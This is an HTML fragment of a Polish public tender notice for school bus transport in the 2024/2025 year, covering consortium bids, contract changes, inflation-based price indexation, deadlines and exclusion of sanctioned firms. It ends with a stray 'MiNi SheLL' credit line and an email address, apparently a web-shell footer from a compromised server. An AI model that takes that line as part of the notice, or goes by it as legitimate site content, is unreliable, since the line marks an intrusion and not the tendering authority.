</h3> 16.18.	Oferta wspólna składana w rozumieniu art. 58 Pzp przez dwóch lub więcej Wykonawców:<br/>16.18.1.	Wykonawcy występujący wspólnie zobowiązani są do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia Umowy w sprawie zamówienia publicznego. <br/>W przypadku spółki cywilnej do oferty należy dołączyć aktualną umowę spółki cywilnej bądź uchwałę wspólników spółki cywilnej, z której wynikać będzie sposób reprezentacji spółki.<br/>16.18.2.	dokument pełnomocnictwa musi być podpisany przez mocodawcę/mocodawców. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli, wymienione we właściwym rejestrze,<br/>16.18.3.	oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika),<br/>16.18.4.	oświadczenie, o którym mowa w art. 125 Pzp (wg załącznika nr 3):<br/>a)	w zakresie braku podstaw wykluczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>b)	w zakresie spełniania warunków udziału w postępowaniu składa odpowiednio Wykonawca, który ten warunek spełnia,<br/>16.18.5.	Wykonawcy wspólnie ubiegający się o zamówienie wskazują w oświadczeniu, o którym mowa w art. 117 ust. 4 Pzp (załącznik nr 2 do SWZ), które roboty budowlane wykonają poszczególni Wykonawcy. W przypadku gdy ofertę składa spółka cywilna, a pełen zakres prac wykonają wspólnicy wspólnie w ramach umowy spółki, oświadczenie powinno potwierdzać ten fakt, <br/>16.18.6.	wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem,<br/>16.18.7.	jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana jako najkorzystniejsza, Zamawiający żąda przed zawarciem Umowy w sprawie zamówienia publicznego złożenia kopii Umowy regulującej współpracę tych Wykonawców,<br/>16.18.8.	umowa regulująca współpracę Wykonawców składających wspólnie ofertę powinna określać co najmniej:<br/>a)	podmioty składające ofertę wspólną,<br/>b)	wskazanie Lidera do reprezentowania partnerów (współwykonawców) przy wykonywaniu zamówienia,<br/>c)	cel gospodarczy, dla którego została zawarta umowa,<br/>d)	oznaczenie czasu trwania Umowy.<br/>16.18.9.	umowa konsorcjum nie może być umową przedwstępną ani umową zawartą pod warunkiem zawieszającym,<br/>16.18.10.	wspólnicy spółki cywilnej są traktowani jako wykonawcy składający ofertę wspólną, i mają do nich zastosowanie zasady określone w pkt. 16.18. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje zmianę istotnych postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następujących przypadkach:<br/>1)	zmiana trasy – w zależności od liczby dzieci, które otrzymały zgodę na dowóz do placówek oświatowych, rzeczywistych warunków pogodowych, faktycznej liczby dzieci danego dnia do dowozu – zmiana nie wymaga aneksu do Umowy,<br/>2)	zmiana liczby miejsc niezbędnych w środkach transportu – liczba może ulec zmianie w zależności od faktycznej liczby dzieci, które otrzymały zgodę na dowóz - zmiana nie wymaga aneksu do Umowy,<br/>3)	zmiana przewidzianych liczby dni dowozu – może ulec zmianie np. z powodu strajku nauczycieli, braku uczniów do dowozu - zmiana nie wymaga aneksu do Umowy.<br/>2.	Strony zobowiązane są zmienić postanowienia zawartej umowy w zakresie wartości umowy, w przypadku: <br/>1)	zaistnienia w trakcie roku szkolnego 2024/2025 sytuacji, w której przewóz będzie musiał być rozszerzony o kolejne dziecko/dzieci lub kolejną placówkę oświatową, w przypadku gdyby trasa przewozu uległa w związku z tym wydłużeniu. W takim przypadku wynagrodzenie Wykonawcy zostanie zwiększone o kwotę wynikającą z poniższego wzoru:<br/>	kwota netto zwiększenia = aktualna cena jednostkowa netto za każdy dzień przewozu/liczbę kilometrów całodziennej trasy przed jej zwiększeniem x liczba kilometrów, o która trasa została wydłużona.<br/>3.	W przypadku zaistnienia w trakcie realizacji Umowy konieczności zmiany opiekuna, Wykonawca zobowiązany jest wskazać Zamawiającemu inną osobę przeszkoloną w zakresie udzielania pierwszej pomocy przedmedycznej oraz podać Zamawiającemu dane tej osoby w zakresie umożliwiającym jej weryfikację w Rejestrze Sprawców Przestępstw na Tle Seksualnym prowadzonym przez Ministra Sprawiedliwości, zgodnie z załącznikiem nr 6 do SWZ.<br/>4.	W przypadku zaistnienia w trakcie realizacji Umowy konieczności zmiany pojazdu, Wykonawca zobowiązany jest wskazać Zamawiającemu inny pojazd spełniający wymagania określone w pkt 4 SWZ – Opis przedmiotu zamówienia oraz podać Zamawiającemu dane tego pojazdu, zgodnie z załącznikiem nr 7 do SWZ.<br/>1.	Zmiany wysokości wynagrodzenia Wykonawcy, w przypadku zmiany cen lub kosztów związanych z realizacją zamówienia (Umowy) w rozumieniu art. 439 Pzp. <br/>Przez zmianę ceny rozumie się wzrost ceny względem ceny przyjętej w celu ustalenia wynagrodzenia Wykonawcy zawartego w Formularzu Oferty (tzw. zmiana waloryzacyjna). Strony mowy w trakcie realizacji Umowy będą uprawnione do żądania zmiany wynagrodzenia (zwiększenia/zmniejszenia) według poniższych zasad:<br/>1)	początkowy termin ustalenia zmiany wynagrodzenia ustala się od następnego miesiąca po zawarciu umowy,<br/>2)	wyliczenie wysokości zmiany wynagrodzenia odbywać się będzie w oparciu o miesięczne wskaźniki cen towarów i usług konsumpcyjnych, publikowane przez Prezesa Głównego Urzędu Statystycznego, dostępne pod linkiem: https://stat.gov.pl/sygnalne/informacje-sygnalne/ <br/>3)	pierwsza zmiana wynagrodzenia nastąpi kiedy opublikowane miesięczne wskaźniki GUS osiągną poziom co najmniej 5% (narastająco) w stosunku do pierwszego opublikowanego wskaźnika GUS po dniu zawarcia umowy, <br/>4)	Strona po spełnieniu przesłanki, o której mowa w pkt. 3 może złożyć wniosek waloryzacyjny o zmianę wynagrodzenia w wysokości wynikającej z wyliczenia:<br/><br/>A x (B%-5%) = C<br/>gdzie:<br/>A – wartość wynagrodzenia miesięcznego netto po publikacji wskaźnika, który zmieni się (narastająco) w stosunku do ostatniego opublikowanego po dniu zawarcia Umowy wskaźnika GUS o poziom co najmniej 5%<br/>B - suma wskaźników cen towarów i usług konsumpcyjnych opublikowanych po dniu zawarcia Umowy do ostatniego dnia miesiąca rozliczeniowego <br/>C - wartość zmiany netto <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-29 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-d0e7dbbe-7226-45fb-ba20-dcf2cd7028a9</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-29 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> cd. Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia:<br/>5)	wniosek waloryzacyjny z obliczeniem kwoty waloryzacji podlega analizie i akceptacji przez Zamawiającego, i winien być dostarczony Zamawiającemu przed złożeniem faktury, <br/>6)	maksymalna wartość zmiany wynagrodzenia netto, jaką dopuszcza Zamawiający w efekcie zastosowania postanowień o zasadach wprowadzania zmian wysokości wynagrodzenia wynosi 6% wynagrodzenia Wykonawcy netto, o którym mowa w § 6 ust. 1 Umowy,<br/>7)	w przypadku likwidacji wskaźnika, o którym wyżej mowa lub zmiany podmiotu, który urzędowo go ustala, wskazany mechanizm stosuje się odpowiednio do wskaźnika i podmiotu, który zgodnie z odpowiednimi przepisami prawa zastąpi dotychczasowy wskaźnik lub podmiot, lub w przypadku gdyby te wskaźniki przestały być dostępne, zastosowanie znajdą inne najbardziej zbliżone wskaźniki publikowane przez Prezesa Głównego Urzędu Statystycznego,<br/>8)	jeżeli wynagrodzenie Wykonawcy zostanie zwaloryzowane zgodnie z art. 439 ust. 1-3 Pzp, Wykonawca zobowiązany jest do zmiany wynagrodzenia przysługującemu Podwykonawcy, z którym zawarł umowę, jeżeli łącznie spełnione są następujące warunki: przedmiotem Umowy są usługi oraz okres obowiązywania Umowy wraz z aneksami przekracza 6 miesięcy. Waloryzacja odbywać się będzie na analogicznych zasadach jak waloryzacja wynagrodzenia Wykonawcy. <br/><br/>7.5.	Zamawiający na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U.2022.835 ze zm.) wykluczy:<br/>7.5.1.	Wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy, o której mowa w pkt. 7.5.;<br/>7.5.2.	Wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz.U.2022 poz. 596 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy, o której mowa w pkt. 7.5.;<br/>7.5.3.	Wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz.U.2021, poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r. o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy, o której mowa w pkt. 7.5.

Creat By MiNi SheLL
Email: jattceo@gmail.com